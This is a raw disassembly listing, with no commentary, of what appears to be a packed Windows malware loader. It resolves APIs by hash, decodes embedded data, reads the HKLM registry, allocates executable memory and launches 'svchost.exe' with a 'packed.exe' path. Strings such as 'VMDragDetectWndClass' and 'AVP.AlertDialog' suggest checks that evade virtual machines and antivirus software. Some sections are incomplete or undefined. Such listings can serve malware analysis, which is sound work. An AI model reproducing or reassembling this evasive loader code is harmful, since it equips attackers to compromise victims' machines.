var_120 = byte ptr -120h
var_1C = dword ptr -1Ch
var_15 = byte ptr -15h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFED4h
pusha
lea eax, [ebp+var_120]
mov [ebp+var_124], eax
push 104h
push [ebp+var_124]
call sub_401078
push 11h
push offset byte_41FFCD
call sub_401078
push [ebp+arg_0]
push ds:dword_4017DA
push offset byte_4017CD
call sub_4016EF
call eax
push eax
push [ebp+arg_0]
call sub_402C6E
mov [ebp+var_12C], eax
jmp short loc_402D04
; ---------------------------------------------------------------------------
dword_402D00 dd 314EE3ABh ; ---------------------------------------------------------------------------
loc_402D04: ; CODE XREF: sub_402CA8+56�j
push 0
push 0
push 0
push 0
push [ebp+var_124]
push 0
push 0
push 0
push ds:dword_402D00
push offset byte_4017CD
call sub_4016EF
call eax
push [ebp+var_124]
push ds:dword_4017DA
push offset byte_4017CD
call sub_4016EF
call eax
cmp eax, 0
jbe short loc_402D53
push eax
push [ebp+var_124]
call sub_402C6E
loc_402D53: ; CODE XREF: sub_402CA8+9D�j
xor [ebp+var_12C], eax
push offset byte_41FFCD
push [ebp+var_12C]
call near ptr 403820h
lea eax, [ebp+var_15]
mov [ebp+var_1C], eax
push 0Fh
push [ebp+var_1C]
call sub_401078
mov [ebp+var_128], 10h
lea eax, [ebp+var_128]
jmp short loc_402D8F
; ---------------------------------------------------------------------------
dword_402D8B dd 82146C22h ; ---------------------------------------------------------------------------
loc_402D8F: ; CODE XREF: sub_402CA8+E1�j
push eax
push [ebp+var_1C]
push ds:dword_402D8B
push offset byte_4017CD
call sub_4016EF
call eax
push [ebp+var_1C]
push ds:dword_4017DA
push offset byte_4017CD
call sub_4016EF
call eax
push eax
push [ebp+var_1C]
call sub_402C6E
lea ebx, byte_41FFCD
add ebx, 8
push ebx
push eax
call near ptr 403820h
popa
leave
retn 4
sub_402CA8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push 19000h
push 40h
push ds:dword_401CC7
push offset byte_4017CD
call sub_4016EF
call eax
mov dword_42001E, eax
lea ebx, [ebp-4]
jmp short loc_402E32
; ---------------------------------------------------------------------------
byte_402E01 db 52h, 2Ch, 1 ; DATA XREF: .text:00402E34�o
dd 5C06306h, 0ED17708h, 20F74C04h, 34FB5626h, 3BC3793Dh
dd 25FB4127h, 6DA053Ah, 20E16615h, 26FA403Bh, 21E6401Fh
dd 7CFA4A20h
db 67h, 0Bh
; ---------------------------------------------------------------------------
loc_402E32: ; CODE XREF: .text:00402DFF�j
push 0
lea eax, byte_402E01
push eax
call sub_4014BB
push ebx
push 20019h
push 0
push eax
push 80000002h
push ds:dword_401CFA
push offset byte_401B79
call sub_4016EF
call eax
or eax, eax
jnz short loc_402ECC
mov dword ptr [ebp-8], 19000h
lea ebx, [ebp-8]
jmp short loc_402E82
; ---------------------------------------------------------------------------
dword_402E70 dd 0DEA910EDh, 0D69912B9h, 0D89F2BB2h, 0C38E0EBAh
; DATA XREF: .text:00402E84�o
; ---------------------------------------------------------------------------
xchg eax, edi
pop ds
loc_402E82: ; CODE XREF: .text:00402E6E�j
push 0
lea eax, dword_402E70
push eax
call sub_4014BB
push ebx
push dword_42001E
push 0
push 0
push eax
push dword ptr [ebp-4]
push ds:dword_401D46
push offset byte_401B79
call sub_4016EF
call eax
jmp short loc_402EB7
; ---------------------------------------------------------------------------
dword_402EB3 dd 2F4A1A22h ; ---------------------------------------------------------------------------
loc_402EB7: ; CODE XREF: .text:00402EB1�j
push dword ptr [ebp-4]
push ds:dword_402EB3
push offset byte_401B79
call sub_4016EF
call eax
loc_402ECC: ; CODE XREF: .text:00402E62�j
mov eax, dword_42001E
add eax, 8
push eax
call sub_402CA8
leave
retn
; ---------------------------------------------------------------------------
dd 3A002100h, 94F3B52h, 1F3E4E7Dh, 82E1CE25h, 3BE999ADh
dd 0B9E19B54h, 2CD6BBDCh, 0EA80AE40h, 0CD8FE089h, 927E51A0h
dd 3B0575FDh, 6C7E1214h, 0D044250Bh, 74D9BCA4h, 2AACDC5Ah
dd 0E72B5B42h, 24A8C6D8h, 1B0019h, 3440543Ch, 0ABDB2450h
dd 143BD0EAh, 0DAA90A25h, 0A6D44531h, 5D2C5431h, 2447331Dh
dd 103FCFA1h, 7F1192FBh, 9DFEF1DFh, 84ED3255h, 0F6C6A699h
dd 0E4D7CAFAh, 80088BAh, 0F3533200h, 6F7A0C97h, 8D6E1E0Eh
dd 223506E4h, 60010h, 2655D3A6h, 0F381E683h, 24161427h
dd 7F000600h, 3C05770Ah, 34B0DD50h, 5F315Bh, 0B2C1000Ch
dd 432082F4h, 0BDD2721Ah, 8AFE9AE9h, 0A9CCF3DDh, 0AFCAFF87h
db 69h, 49h
word_402FA6 dw 2Eh ; DATA XREF: .text:00403178�o
byte_402FA8 db 0FFh ; DATA XREF: .text:004030EF�r
db 3 dup(0FFh)
dd 9 dup(0FFFFFFFFh), 3EFFFFFFh, 3FFFFFFFh, 37363534h
dd 3B3A3938h, 0FFFF3D3Ch, 0FFFF00FFh, 20100FFh, 6050403h
dd 0A090807h, 0E0D0C0Bh, 1211100Fh, 16151413h, 0FF191817h
dd 0FFFFFFFFh, 1C1B1AFFh, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 0FF333231h, 4 dup(0FFFFFFFFh)
db 3 dup(0FFh)
public start
start db 0FFh
dd 1Bh dup(0FFFFFFFFh)
db 3 dup(0FFh)
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
pusha
push dword ptr [ebp+8]
push ds:dword_4017DA
push offset byte_4017CD
call sub_4016EF
call eax
mov [ebp-4], eax
or eax, eax
jnz short loc_4030D3
mov eax, 0FFFFFFFFh
leave
retn 8
; ---------------------------------------------------------------------------
loc_4030D3: ; CODE XREF: .text:004030C8�j
mov esi, [ebp+8]
mov edi, [ebp+0Ch]
mov ecx, [ebp-4]
shr ecx, 2
cld
loc_4030E0: ; CODE XREF: .text:00403115�j
push ecx
mov ecx, 4
xor ebx, ebx
lodsd
loc_4030E9: ; CODE XREF: .text:00403103�j
push eax
and eax, 0FFh
mov al, ds:byte_402FA8[eax]
cmp al, 0FFh
jz short loc_40311B
shl ebx, 6
or bl, al
pop eax
shr eax, 8
dec ecx
jnz short loc_4030E9
mov eax, ebx
shl eax, 8
xchg ah, al
ror eax, 10h
xchg ah, al
stosd
dec edi
pop ecx
dec ecx
jnz short loc_4030E0
xor eax, eax
jmp short loc_40311E
; ---------------------------------------------------------------------------
loc_40311B: ; CODE XREF: .text:004030F7�j
push 0FFFFFFFFh
pop eax
loc_40311E: ; CODE XREF: .text:00403119�j
popa
leave
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push eax
push ebx
push ecx
mov ecx, [ebp+8]
mov ebx, ecx
add ebx, [ebp+0Ch]
loc_403131: ; CODE XREF: .text:00403140�j
mov al, [ecx]
cmp al, [ebp+10h]
jnz short loc_40313D
mov al, [ebp+14h]
mov [ecx], al
loc_40313D: ; CODE XREF: .text:00403136�j
inc ecx
cmp ecx, ebx
jnz short loc_403131
pop ecx
pop ebx
pop eax
leave
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push 105h
push 40h
push ds:dword_401CC7
push offset byte_4017CD
call sub_4016EF
call eax
mov [ebp-4], eax
jmp short loc_403171
; ---------------------------------------------------------------------------
dword_40316D dd 0B3967D80h ; ---------------------------------------------------------------------------
loc_403171: ; CODE XREF: .text:0040316B�j
push dword ptr [ebp-4]
push 0
push 0
push offset word_402FA6
push ds:dword_40316D
push offset byte_4017CD
call sub_4016EF
call eax
jmp short loc_40319A
; ---------------------------------------------------------------------------
byte_403191 db 0, 5Eh, 6 ; DATA XREF: .text:004031B2�o
; ---------------------------------------------------------------------------
or ecx, [ebx]
mov edx, edi
xor [edi], edx
loc_40319A: ; CODE XREF: .text:0040318F�j
jmp short loc_4031A0
; ---------------------------------------------------------------------------
dword_40319C dd 0E29B805Dh ; ---------------------------------------------------------------------------
loc_4031A0: ; CODE XREF: .text:loc_40319A�j
push 0
push 0
push dword ptr [ebp-4]
push dword ptr [ebp+8]
push 0
push ds:dword_40319C
push offset byte_403191
call sub_4016EF
call eax
cmp dword ptr [ebp+0Ch], 1
jnz near ptr byte_403255
push 400h
push offset dword_42D0C0
call sub_401078
push 0
push 80h
push 3
push 0
push 3
push 80000000h
push dword ptr [ebp-4]
push ds:dword_401E64
push offset byte_4017CD
call sub_4016EF
call eax
cmp eax, 0FFFFFFFFh
jz short near ptr byte_403255
mov [ebp-10h], eax
push 0
push offset dword_405000
push 400h
push offset dword_42D0C0
push dword ptr [ebp-10h]
push ds:dword_401EE6
push offset byte_4017CD
call sub_4016EF
call eax
push dword ptr [ebp-10h]
push ds:dword_401915
push offset byte_4017CD
call sub_4016EF
call eax
cmp dword ptr ds:0FFFF5000h, 0FFFFFFFFh
; ---------------------------------------------------------------------------
dd 3 dup(?)
db ?
byte_403255 db 3 dup(?) ; CODE XREF: .text:004031C2�j
; .text:00403201�j
dd 6Ah dup(?)
_text ends
; Section 2. (virtual address 00004000)
; Virtual size : 00002950 ( 10576.)
; Section size in file : 00002950 ( 10576.)
; Offset to raw data for section: 00004000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 404000h
dd 7C809B47h, 7C810637h, 7C80C058h, 7C80FC2Fh, 7C801D77h
dd 7C802442h, 7C801AD0h, 7C802520h, 7C834D41h, 0
dd 4050h, 2 dup(0)
dd 40FEh, 4000h, 5 dup(0)
dd 4078h, 4086h, 4096h, 40A4h, 40B2h, 40C2h, 40CAh, 40DCh
dd 40F2h, 0
db 23h ; #
align 2
aClosehandle db 'CloseHandle',0
aV db 'V',0
aCreatethread db 'CreateThread',0
align 2
db 'œ',0
aExitthread db 'ExitThread',0
align 4
db 0ACh ; ¬
db 1, 47h, 6Ch
aObalfree db 'obalFree',0
align 2
dw 1EAh
aLoadlibrarya db 'LoadLibraryA',0
align 2
dw 2BBh
aSleep db 'Sleep',0
dw 2E2h
aVirtualprotect db 'VirtualProtect',0
align 4
db 0ECh ; ì
db 2, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
dw 313h
aLstrcata db 'lstrcatA',0
align 2
aKernel32_dll db 'kernel32.dll',0
align 4
dd 3BDh dup(0)
dword_405000 dd 0 ; sub_401F9A+77�o ...
off_405004 dd offset loc_401165 ; DATA XREF: sub_401000+6�o
; sub_4010B0+71�w
dword_405008 dd 12FF6Ch dword_40500C dd 12FF98h dword_405010 dd 1 ; sub_40117B:loc_401300�o ...
dword_405014 dd 0 ; sub_401311+188�r ...
dword_405018 dd 0 ; sub_40117B+18�r ...
dd 3 dup(0)
dword_405028 dd 103h dup(0) ; sub_4014BB+65�o
db 0
byte_405435 db 3 dup(0) ; DATA XREF: sub_401311+5B�o
; sub_4014BB+76�o
dd 100h dup(0)
db 2 dup(0)
word_40583A dw 40h ; DATA XREF: sub_40155F+7�o
; sub_4015B1+4�o
db 2 dup(0)
word_40583E dw 5C8h ; DATA XREF: sub_40166A+C�o
db 2 dup(0)
aSvchost_exe db 'svchost.exe ',0 ; DATA XREF: sub_401629+1B�o
; .text:loc_401B51�o ...
align 10h
dd 440h dup(0)
align 100h
_rdata ends
; Section 3. (virtual address 00007000)
; Virtual size : 0002BE54 ( 179796.)
; Section size in file : 0002BE54 ( 179796.)
; Offset to raw data for section: 00007000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 407000h
dd 5E16h dup(0)
dword_41E858 dd 0 ; sub_4017C8:loc_401893�r
dword_41E85C dd 0 ; sub_4017C8+B0�r ...
dword_41E860 dd 0 ; sub_4017C8+5A�w ...
dword_41E864 dd 41h dup(0) ; sub_4017C8:loc_401859�o
db 0
dword_41E969 dd 50h ; sub_4018A3+44�r ...
dword_41E96D dd 128h ; sub_4018A3:loc_4018E2�o ...
db 51h, 5, 91h
db 7Ch
dword_41E975 dd 140AD8h db 6Dh, 5, 91h
dd 14322A7Ch, 0
dd 205C400h, 800h, 0
db 0
aPacked_exe db 'packed.exe',0 ; DATA XREF: sub_4018A3:loc_401904�o
aE db 'e',0
a_exe db '.exe',0
align 4
dd 3Ch dup(0)
db 0
dword_41EA95 dd 0 ; .text:00401BDD�r ...
dword_41EA99 dd 0 ; .text:00401C07�o
dword_41EA9D dd 0 ; .text:loc_401C4B�r
dword_41EAA1 dd 0 dword_41EAA5 dd 0 byte_41EAA9 db 3 dup(0) ; DATA XREF: .text:00401B56�o
; .text:00401C10�o
dd 4 dup(0)
db 0
byte_41EABD db 3 dup(0) ; DATA XREF: sub_401CBF+2A�o
; sub_401CBF+4A�o ...
dd 100h dup(0)
dword_41EEC0 dd 0 ; .text:0040221C�r ...
dword_41EEC4 dd 0 ; .text:0040224F�w ...
dword_41EEC8 dd 0 ; .text:00402234�r ...
dword_41EECC dd 0 ; .text:00402257�o ...
dword_41EED0 dd 0 ; .text:004022BF�r ...
dword_41EED4 dd 0 dword_41EED8 dd 145F18h ; sub_402141+5A�r ...
dword_41EEDC dd 0 ; sub_402141+44�w ...
dword_41EEE0 dd 0 ; .text:004024A9�r
dword_41EEE4 dd 0 ; .text:004023DB�r ...
dword_41EEE8 dd 0 ; .text:loc_40237C�o
dword_41EEEC dd 0 dd 5 dup(0)
dword_41EF04 dd 0 ; .text:004023E5�r
dword_41EF08 dd 0 ; sub_401E5C+9B�r ...
dword_41EF0C dd 0 ; sub_401E5C+63�r ...
dd 141h dup(0)
db 0
byte_41F415 db 3 dup(0) ; DATA XREF: sub_4026B0+12�o
; sub_4026B0+34�o ...
dd 0FFh dup(0)
db 0
aVmdragdetectwn db 'VMDragDetectWndClass',0 ; DATA XREF: sub_402914+19�o
; sub_402914+3E�o
align 4
dd 0FAh dup(0)
db 0
byte_41FC15 db 3 dup(0) ; DATA XREF: sub_4026B0+16E�o
; .text:00402AAB�o
dd 31h dup(0)
db 0
aAvp_alertdialo db 'AVP.AlertDialog',0 ; DATA XREF: sub_402914:loc_40294D�o
; .text:0040299C�o ...
align 10h
dd 14h dup(0)
db 0
dword_41FD41 dd 0 ; sub_402859+6F�r ...
dword_41FD45 dd 0 ; sub_4026B0+C8�r ...
byte_41FD49 db 3 dup(0) ; DATA XREF: sub_402859+67�o
; sub_402859+91�o
dd 7Fh dup(0)
db 0
dword_41FF49 dd 0 ; sub_4026B0+B2�o ...
dword_41FF4D dd 0D8h ; sub_4026B0+BC�o ...
dword_41FF51 dd 0 ; sub_402859+8�w ...
dword_41FF55 dd 0 ; .text:00402ADC�o
align 4
dd 0Fh dup(0)
db 0
byte_41FF99 db 3 dup(0) ; DATA XREF: .text:loc_402AD7�o
dd 0Ch dup(0)
db 0
byte_41FFCD db 3 dup(0) ; DATA XREF: sub_402CA8+28�o
; sub_402CA8+B1�o ...
dd 13h dup(0)
db 2 dup(0)
dword_42001E dd 0 ; .text:00402E91�r ...
align 8
dd 44h, 0Ah dup(0)
dd 1, 2, 4 dup(0)
dd 7Ch, 80h, 4F4h, 4F0h, 2F000h, 400000h, 2F000h, 0
dd 10007h, 23h dup(0)
dd 38h, 2 dup(23h), 12F804h, 8, 7FFDE000h, 7C90EE18h, 7C910570h
dd 1002509h, 7C91056Dh, 4032E1h, 1Bh, 200h, 7FFFCh, 23h
dd 82h dup(0)
dd 400000h, 0
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0
align 4
dd 79h dup(0)
aSvchost_exeCM_ db 'svchost.exe C:\m_unpacker\packed.exe',0
align 10h
dd 32CCh dup(0)
dword_42D0C0 dd 1765h dup(0) ; .text:00403212�o
align 200h
_data ends
; Section 5. (virtual address 00034000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00033E00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 434000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start